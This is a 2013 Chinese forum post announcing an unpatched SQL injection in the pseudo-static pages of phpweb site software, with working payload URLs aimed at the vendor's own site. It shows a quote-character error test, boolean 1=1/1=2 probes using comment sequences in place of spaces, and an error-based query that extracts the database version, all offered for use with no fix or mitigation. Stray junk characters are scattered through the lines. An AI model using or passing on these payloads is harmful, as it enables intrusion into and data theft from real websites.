找回密码
 立即注册
查看: 2774|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入4 w* i& n" p+ n5 q

- j5 S& J. D! I  S2 J( y9 P主站:http://phpweb.net/
7 A2 M4 v3 Y( Q加’检测:
1 L. v# M- v! u, T+ {% p/ g8 \
' w) G* I# d. v1 B1 X, zhttp://www.phpweb.net/down/html/?772′.html# V+ ~+ I8 j' T

9 Z6 |  V% M: X# s8 w& N4 o出错. Q/ M- @8 {3 E# j9 k, p% J
存在注入。
8 c. r# y" G% y  w. O不能用空格,只能用/*罗
* }- o: z1 r  e! r9 H. phttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
4 ^0 a+ p" \+ J3 U" H' [
, p+ }, g. D- s+ ~% qhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
5 L: `" {  B, N; D3 V爆数据库版本:
5 D: X  B2 G1 [: N! y# ]
3 G2 s$ G* e3 T+ a?
1 E9 x, U$ @" l5 w19 p" I; ~- a8 l, g
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
9 O1 f9 c! E" p; b) f/ d更新日期: 2013-01-03 13:39:50        2 u% K3 {. T3 I/ O5 ~3 i! ~, S: |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表